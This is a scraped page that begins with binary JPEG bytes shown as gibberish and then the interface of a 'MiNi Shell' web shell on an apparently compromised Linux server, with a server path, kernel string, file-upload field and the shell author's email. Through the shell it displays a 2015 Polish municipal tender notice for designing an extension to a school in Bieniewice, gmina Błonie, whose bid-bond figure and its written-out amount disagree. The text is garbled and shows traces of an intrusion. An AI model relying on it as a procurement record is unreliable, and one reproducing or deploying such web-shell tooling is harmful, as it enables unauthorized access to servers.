JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150422/57107-N-2015.html

<p class="kh_header"><b>Błonie: Wykonanie projektu budowlanego i wykonawczego oraz dokumentacji kosztorysowej na   
   rozbudowę Zespołu Szkół w Bieniewicach gmina Błonie, ul. Błońska 62 dz. nr ew. 196/3
   obręb Błonie.</b><br>
<b>Numer ogłoszenia: 57107 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i wykonawczego oraz dokumentacji kosztorysowej na   
   rozbudowę Zespołu Szkół w Bieniewicach gmina Błonie, ul. Błońska 62 dz. nr ew. 196/3
   obręb Błonie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia:
1.1. Przedmiot zamówienia obejmuje wykonanie kompleksowej dokumentacji projektowej budowlanej  
       i wykonawczej rozbudowy Zespołu Szkół w Bieniewicach wraz z uzyskaniem prawomocnego
       pozwolenia na budowę. 
1.2. Wykonanie wielobranżowej dokumentacji budowlanej i wykonawczej rozbudowy Zespołu Szkół
       w Bieniewicach z wykorzystaniem załączonej koncepcji stanowiącej załącznik do niniejszej SIWZ,   
       opracowanej przez - Woźnicki, Zdanowicz Architekci z dnia 18.08.2014r.
1.3. Dokumentacja projektowanej rozbudowy, w oparciu o wypis z miejscowego planu  
       zagospodarowania przestrzennego Gminy Błonie.
1.4. Budynek szkoły składa się z dwóch dwukondygnacyjnych części połączonych parterowym 
       łącznikiem. Celem inwestycji jest powiększenie ilości sal lekcyjnych, budowa nowych sanitariatów 
       oraz poprawa funkcjonowania komunikacji wewnętrznej w obiekcie.
1.5. Przedmiot zamówienia obejmuje zaprojektowanie:
       na parterze: 
  a) 2 sale lekcyjne,
  b) salę wielofunkcyjną ( świetlica, biblioteka, czytelnia),  
  c) toalety uczniowskie ( dziewcząt i chłopców) oraz jedną ogólnodostępną dostosowaną do   
      potrzeb osób niepełnosprawnych,
  d) pokój nauczycieli wychowania fizycznego z węzłem sanitarnym i magazynem sprzętu sportowego,     
  e) schowki i pomieszczenia porządkowe.
      na piętrze:
   a) 4 sale lekcyjne,
   b) toalety uczniowskie ( dziewcząt i chłopców),
   c) schowki i pomieszczenia porządkowe.
1.6. Rozbudowę należy wyposażyć w następujące instalacje:
   a) wentylacji mechanicznej, nawiewno wywiewnej,
   b) kanalizacyjną, sanitarną podłączoną do istniejącej instalacji budynku,
   c) wodociągową zimnej i ciepłej wody użytkowej podłączonych do istniejącej instalacji budynku, 
   d) centralnego ogrzewania, wodną podłączona do istniejącej instalacji budynku,
   e) oświetlenia elektrycznego,
   f) elektrycznych gniazd zasilania ogólnego 230V,
   g) gniazd sieci teleinformatycznej,
   h) instalacji dzwonowej podłączonej do istniejącej instalacji budynku.
2. Zakres opracowania przedmiotu zamówienia obejmuje:
  1) kompletne projekty budowlane i wykonawcze wraz ze wszystkimi uzgodnieniami na rozbudowę 
      Zespołu Szkół w Bieniewicach wraz z projektami branżowymi,
  2) kosztorysy inwestorskie i przedmiary robót,
  3) specyfikacje techniczne wykonania i odbioru robót,
  4) prawomocne pozwolenie na budowę,
  5) prowadzenie nadzoru autorskiego.
2.1. Prace przygotowawcze: 
  1) mapy do celów projektowych,
  2) badania geotechniczne,
  3) warunki techniczne,
  4) inwentaryzacja budowlana obiektu i całego terenu.
2.2. Projekty w rozbiciu tematycznym:
 1) projekt zagospodarowania terenu z elementami małej architektury, zielenią, oświetleniem terenu,
     ogrodzeniem, inwentaryzacja drzew, krzewów i innych obiektów na terenie objętym opracowaniem,
 2) projekt branży architektonicznej, detale i wyposażenie wraz z meblami,   
 3) projekt aranżacji wnętrz, kolorystyka,
 4) projekt branży konstrukcyjnej,
 5) projekt instalacji elektrycznej, odgromowej, teletechnicznej, nagłośnienia, sieci komputerowej,
      TV, p.pożarowej, alarmowej, monitoringu,
 6) projekt instalacji sanitarnych: wod.-kan., wentylacji, klimatyzacji, grzewczych (sieć miejska),   
 7) projekt przyłączy: wod.-kan., gazu,energetycznych, telefonicznych,
 8) projekty rozwiązań ewentualnych kolizji z urządzeniami podziemnymi i inne niezbędne,
 9) dokumentacja geotechniczna ,
10) projekt komunikacji - dostosowanie budynku dla potrzeb osób niepełnosprawnych,
11) specyfikacje techniczne wykonania i odbioru robót budowlanych dla wszystkich branż,
12) instrukcja bezpieczeństwa i ochrony zdrowia  (BIOZ),
13) świadectwo charakterystyki energetycznej budynku,
14) przedmiary robót i kosztorysy inwestorskie w oparciu o KNNR,
15) wizualizacja budynku. 
2.3. Wykonanie projektów w ilości:   
1) projekt zagospodarowania terenu, wykonany na aktualnej mapie do celów projektowych - 5 egz.
     (w tym 2 egzemplarze na oryginałach aktualnej mapy do celów projektowych)
 2) projekty budowlane  - 5 egz.,
 3) projekty wykonawcze  - 3 egz.,
 4) dokumentacja geotechniczna  - 4 egz.,
 5) kosztorysy inwestorskie i przedmiary robót  - 3 egz.,
 6) specyfikacje techniczne wykonania i odbioru robót budowlanych  - 3 egz.,
 7) plansza zbiorcza sieci i uzbrojenia terenu zaopiniowana w ZUDP  - 2 oryginały, opinie, uzgodnienia 
     i sprawdzenia.
2.4. Wszystkie materiały winny być dostarczone w formie papierowej we wskazanych powyżej 
       ilościach oraz w postaci elektronicznej na nośniku CD,
   a) kosztorysy inwestorskie w formacie ATH z mozliwością odtwarzania w programie  NORMA,
   b) przedmiary robót w formacie ATH i PDF,   
   c) projekty techniczne i specyfikacje techniczne w formacie PDF.
Projektant ma obowiązek konsultować z Zamawiającym stosowane w projekcie rozwiązania celem ich akceptacji bądź wniesienia ewentualnych uwag..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości 2.000,00 PLN     
           (słownie: dwadzieścia tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat 
      przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
      okresie, wykonał:
      -  min. 2 usługi o podobnym charakterze co przedmiot zamówienia, tj. usługi polegające na 
      wykonaniu kompletnej dokumentacji projektowej budowy, rozbudowy, przebudowy budynku 
      oświaty o wartości min. 100.000,00 zł każda, na którą została wydana decyzja pozwolenia na 
      budowę, wraz z załączeniem dowodów (referencji) potwierdzających, czy zostały wykonane 
      należycie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna za spełniony warunek dysponowania osobami zdolnymi do wykonania 
      zamówienia, jeżeli Wykonawca wykaże, że będzie dysponował min.1 osobą posiadającą 
      uprawnienia do projektowania w specjalności: 
      - architektonicznej,
      - konstrukcyjno-budowlanej,
      - instalacji gazowych, sanitarnych i wodociągowych
      - instalacji i urządzeń elektrycznych, elektroenergetycznych, 
      - telekomunikacyjnych,
      posiadającą aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa 
      z aktualnym ubezpieczeniem, min.3-letnie doświadczenie zawodowe w pełnieniu funkcji  
      projektanta, ponadto Wykonawca wskaże osobę odpowiedzialną za wykonanie zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej i finansowej,
      jeżeli Wykonawca przedstawi informacje banku lub spółdzielczej kasy oszczędnościowo-
      kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność 
      kredytową w wysokości nie mniejszej niż 100.000,00 zł wystawionej nie wcześniej niż 
      3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się inne dokumenty wymagane przez Zamawiającego:
1. formularz oferty wypełniony i podpisany przez osoby uprawnione  (załącznik  do SIWZ),
2. dowód wniesienia wadium,
3. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp. 
       ( załącznik do SIWZ),
4. oświadczenie dotyczące podmiotów należących do tej samej grupy kapitałowej
       tj. lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 
       16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacje o tym, że  
       nie należy do grupy kapitałowej (załącznik do SIWZ),
5. podpisany wzór umowy (załącznik do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany treści umowy w sytuacji jakiej nie można było 
       przewidzieć w chwili zawarcia umowy. Zmiana umowy może nastąpić w sytuacjach:
  a) nastąpi ustawowa zmiana obowiązującej stawki podatku VAT, w takim przypadku 
      wysokość wynagrodzenia należnego Wykonawcy ustalona będzie każdorazowo na dzień
      wystawienia faktury (powstania obowiązku podatkowego),
  b) działania lub zaniechania osób trzecich np. organów administracji publicznej lub innych 
      podmiotów uczestniczących w procedurze opiniowania i uchwalania,
  c) złożenie skargi lub wniosku do właściwych organów administracyjnych lub sądowych lub 
      odwołania od ich rozstrzygnięcia, o ile będą mogły mieć wpływ na zmianę terminu 
      realizacji,     
  d) gdy zajdzie potrzeba wykonania opracowań nieprzewidzianych w zamówieniu, 
  e) w innych przypadkach, których nie można było przewidzieć w chwili zawarcia umowy,a  
       które nie mają wpływu na wybór Wykonawcy w przeprowadzonym przetargu.
 Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może 
 wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno   
 przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, ul. Rynek 6 05-870 Błonie
Wydział Zamówień Publicznych pok. nr 3 (Ratusz).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 11:00, miejsce: Urząd Miejski w Błoniu, ul. Rynek 6  05-870 Błonie
Biuro Obsługi Interesanta pok. nr 1 (Ratusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Bożena Hofman, Agnieszka Kulesz  (procedury przetargowe)  -  Urząd Miejski w Błoniu, ul. Rynek 6 
 Wydział Zamówień Publicznych, pok. nr 3, tel.  22 725-30-04  w.180.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com